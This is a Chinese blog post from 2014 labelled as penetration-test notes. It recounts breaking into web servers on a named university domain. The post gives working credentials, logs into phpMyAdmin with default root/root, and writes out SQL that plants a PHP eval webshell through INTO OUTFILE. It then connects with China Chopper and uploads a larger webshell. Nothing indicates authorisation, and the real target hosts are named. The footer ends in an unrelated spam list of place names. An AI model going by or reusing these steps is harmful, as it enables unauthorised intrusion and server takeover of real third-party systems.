qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          滲透測試筆記

          今天朋友在入侵織夢的網站系統,通過最新的Exp獲得了織夢后臺的賬號和密碼
            賬號:admin
            密碼:abc123456
            但是,找來找去找不到后臺,就讓我提權試試。
            我看了下:http://pxc.ncist.edu.cn/dede/
            后臺被刪除了!怎么辦??
            google hack也沒找到后臺
            后來,我試了試這個網站:http://zsjy.ncist.edu.cn/phpmyadmin
            輸入默認MySql賬號與密碼:
            賬號:root
            密碼:root
            居然進去了:
            接下來就是phpmyadmin提權了:
            我的思路是:
            1.先爆出php服務器www的路徑
            2.然后通過將php一句話插入數據庫再導出到www路徑
            通過google hack爆到路徑:D\www\
            呵呵,接下來就執行sql語句:
          CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
          INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
          SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
            這段sql意思是:
            1.在mysql數據庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
            2.將php一句話木馬插入數據庫中的xss1字段處
            3.將數據庫中xss1字段的內容導出到d:\www\x.php文件中
            這下,通過chopper連接x.php小馬得到shell


           接下來,上傳一個php大馬spider.php
            通過FF連接spider.php:
            成功獲得webshell!!!

          posted on 2014-04-24 10:21 順其自然EVO 閱讀(512) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄 、安全性測試

          <2014年4月>
          303112345
          6789101112
          13141516171819
          20212223242526
          27282930123
          45678910

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 申扎县| 寿阳县| 濉溪县| 福州市| 荔浦县| 仪陇县| 镇雄县| 淳安县| 雷山县| 辽宁省| 黄平县| 集贤县| 胶州市| 平远县| 碌曲县| 武乡县| 泰州市| 绥阳县| 安塞县| 正镶白旗| 星子县| 大姚县| 习水县| 额敏县| 南康市| 丹东市| 沈阳市| 海原县| 治多县| 广西| 隆德县| 崇义县| 额尔古纳市| 荣昌县| 象山县| 八宿县| 沁水县| 驻马店市| 丰台区| 辽宁省| 茶陵县|